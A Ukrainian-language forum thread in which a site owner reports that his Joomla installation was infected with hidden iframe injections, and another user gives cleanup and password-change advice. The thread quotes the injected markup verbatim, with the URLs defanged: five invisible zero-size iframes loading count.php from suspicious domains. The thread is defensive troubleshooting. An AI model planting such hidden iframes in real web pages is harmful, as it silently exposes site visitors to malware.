Joomla! iframe injection / hack

[Andy]

Почалося з того, що NOD32 заблокував попап вікно в редакторі tyniMCE при редагуванні лінків та якорів.
Виявилося, що в файлах
/pluginseditorstinymcejscriptstiny_mcethemesadvancedanchor.htm
/pluginseditorstinymcejscriptstiny_mcethemesadvancedlink.htm
знайшов ось таке

...
</html>
<iframe src="хттп://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

тільки іфрейми однією стрічкою (що характерно, якщо не однією стрічкою - антивірус не бере), і звісно ж хттп як http.

Отут прочитав [url=]http://benmay.org/web-design-info/joomla-iframe-injection-hack[/url=] що це хак і заражено багато файлів.

Наслідки:
- сторінки блокуються антивіром (і не тільки поп-апи), тобто деякий денай оф сервіс
- тормозить при формуванні сторінок
- реалізована заготовка для закачування вредоносного коду

Хто знає де в джумлі проблема і як цю дірку заліпити ?

P.S. сайт у грудні було оновлено до останньої версії 1.5.8, але цей апдейт не заміщує файлів що заражено.

[Dutch]

1. Оновити до останньої версії джумла, своєї лінійки
2. змінити всюди де вікористовується доступ до фтп сайту логіни та паролі до фтп
3. змінити логіни та паролі до БД
4. перевірити антивірусом компи з яких є доступ до фтп
5. перевірити фаєрволом порти, наявність троянів, спайвери

Висновок: хакнули трояном спочатку ваш комп та викрали паролі до фтп, а вже далі зайшли на ваш сайт як юзер (див. логи сервера хто та звідки по ай пі, і можете сміливо відписувати провайдеру того хто хакнув ваш сайт ).

[Andy]

Дуже дякую за відповідь. На роботі та вдома компи захищені, але ж, звісно, ідеального захисту не існує. От у колеги віруси регулярно, але я не впевнений що інформацію поцупули через його комп.

Джумлу полікував, патч 1.5.8 -> 1.5.9 навернув. Явки, та паролі змінив.
Було заражено мейже усі файли html, а також файли index.php та administrator\index.php зі зміною тексту, щоб антивірус не схоплював. Думаю, що через ці базові файли вкачувався код, який заражав рештку файлів. Бо при першому лікуванні я не знайшов сігнатури в цих файлах і не замінив їх. І через деякий час все було знов завалено іфреймами.

Поки що все гаразд.
Цікаво було б дізнатися яка сволота погралася.